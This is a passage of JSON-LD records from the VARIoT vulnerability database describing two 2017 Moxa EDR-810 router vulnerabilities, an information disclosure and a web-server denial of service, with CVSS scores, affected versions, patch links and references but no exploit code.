"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-12128",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-11725",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-102619",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-12128",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-12128",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-12128",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-11725",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-1625",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-102619",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11725"
},
{
"db": "VULHUB",
"id": "VHN-102619"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013420"
},
{
"db": "NVD",
"id": "CVE-2017-12128"
},
{
"db": "NVD",
"id": "CVE-2017-12128"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1625"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable information disclosure vulnerability exists in the Server Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted TCP packet can cause information disclosure. An attacker can send a crafted TCP packet to trigger this vulnerability. Moxa EDR-810 Contains an information disclosure vulnerability.Information may be obtained. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12128"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013420"
},
{
"db": "CNVD",
"id": "CNVD-2018-11725"
},
{
"db": "VULHUB",
"id": "VHN-102619"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "TALOS",
"id": "TALOS-2017-0480",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2017-12128",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013420",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1625",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11725",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-97230",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-102619",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11725"
},
{
"db": "VULHUB",
"id": "VHN-102619"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013420"
},
{
"db": "NVD",
"id": "CVE-2017-12128"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1625"
}
]
},
"id": "VAR-201805-0127",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11725"
},
{
"db": "VULHUB",
"id": "VHN-102619"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11725"
}
]
},
"last_update_date": "2023-12-18T13:48:15.201000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "MoxaEDR-810 Information Disclosure Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132233"
},
{
"title": "Moxa EDR-810 Repair measures for information disclosure vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190029"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11725"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013420"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1625"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-102619"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013420"
},
{
"db": "NVD",
"id": "CVE-2017-12128"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0480"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12128"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12128"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0480"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11725"
},
{
"db": "VULHUB",
"id": "VHN-102619"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013420"
},
{
"db": "NVD",
"id": "CVE-2017-12128"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1625"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11725"
},
{
"db": "VULHUB",
"id": "VHN-102619"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013420"
},
{
"db": "NVD",
"id": "CVE-2017-12128"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1625"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11725"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-102619"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013420"
},
{
"date": "2018-05-14T20:29:00.563000",
"db": "NVD",
"id": "CVE-2017-12128"
},
{
"date": "2017-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1625"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11725"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-102619"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013420"
},
{
"date": "2022-12-09T01:45:52.187000",
"db": "NVD",
"id": "CVE-2017-12128"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1625"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1625"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 Information Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11725"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1625"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1625"
}
],
"trust": 0.6
}
}
VAR-201805-0123
Vulnerability from variot - Updated: 2023-12-18 13:33An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in the web server crashing. An attacker can send a crafted URI to trigger this vulnerability. Moxa EDR-810 Includes input validation vulnerabilities, and NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. MoxaEDR-810 is a secure router with Moxa's firewall and VPN capabilities
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0123",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09584"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013410"
},
{
"db": "NVD",
"id": "CVE-2017-12124"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1629"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12124"
}
]
},
"cve": "CVE-2017-12124",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-12124",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-09584",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-102615",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-12124",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-12124",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-12124",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-12124",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2018-09584",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-1629",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-102615",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2017-12124",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09584"
},
{
"db": "VULHUB",
"id": "VHN-102615"
},
{
"db": "VULMON",
"id": "CVE-2017-12124"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013410"
},
{
"db": "NVD",
"id": "CVE-2017-12124"
},
{
"db": "NVD",
"id": "CVE-2017-12124"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1629"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in the web server crashing. An attacker can send a crafted URI to trigger this vulnerability. Moxa EDR-810 Includes input validation vulnerabilities, and NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. MoxaEDR-810 is a secure router with Moxa\u0027s firewall and VPN capabilities",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12124"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013410"
},
{
"db": "CNVD",
"id": "CNVD-2018-09584"
},
{
"db": "VULHUB",
"id": "VHN-102615"
},
{
"db": "VULMON",
"id": "CVE-2017-12124"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-12124",
"trust": 3.2
},
{
"db": "TALOS",
"id": "TALOS-2017-0476",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013410",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1629",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-09584",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-97228",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-102615",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-12124",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09584"
},
{
"db": "VULHUB",
"id": "VHN-102615"
},
{
"db": "VULMON",
"id": "CVE-2017-12124"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013410"
},
{
"db": "NVD",
"id": "CVE-2017-12124"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1629"
}
]
},
"id": "VAR-201805-0123",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09584"
},
{
"db": "VULHUB",
"id": "VHN-102615"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09584"
}
]
},
"last_update_date": "2023-12-18T13:33:51.945000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for MoxaEDR-810 Denial of Service Vulnerability (CNVD-2018-09584)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/129207"
},
{
"title": "Moxa EDR-810 Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=190032"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09584"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013410"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1629"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
},
{
"problemtype": "CWE-476",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-102615"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013410"
},
{
"db": "NVD",
"id": "CVE-2017-12124"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0476"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12124"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12124"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0476"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/476.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/20.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/141669"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09584"
},
{
"db": "VULHUB",
"id": "VHN-102615"
},
{
"db": "VULMON",
"id": "CVE-2017-12124"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013410"
},
{
"db": "NVD",
"id": "CVE-2017-12124"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1629"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-09584"
},
{
"db": "VULHUB",
"id": "VHN-102615"
},
{
"db": "VULMON",
"id": "CVE-2017-12124"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013410"
},
{
"db": "NVD",
"id": "CVE-2017-12124"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1629"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09584"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-102615"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULMON",
"id": "CVE-2017-12124"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013410"
},
{
"date": "2018-05-14T20:29:00.360000",
"db": "NVD",
"id": "CVE-2017-12124"
},
{
"date": "2017-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1629"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09584"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-102615"
},
{
"date": "2018-06-15T00:00:00",
"db": "VULMON",
"id": "CVE-2017-12124"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013410"
},
{
"date": "2022-12-09T01:56:17.717000",
"db": "NVD",
"id": "CVE-2017-12124"
},
{
"date": "2022-12-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1629"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1629"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 Input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013410"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1629"
}
],
"trust": 0.6
}
}
VAR-201805-0126
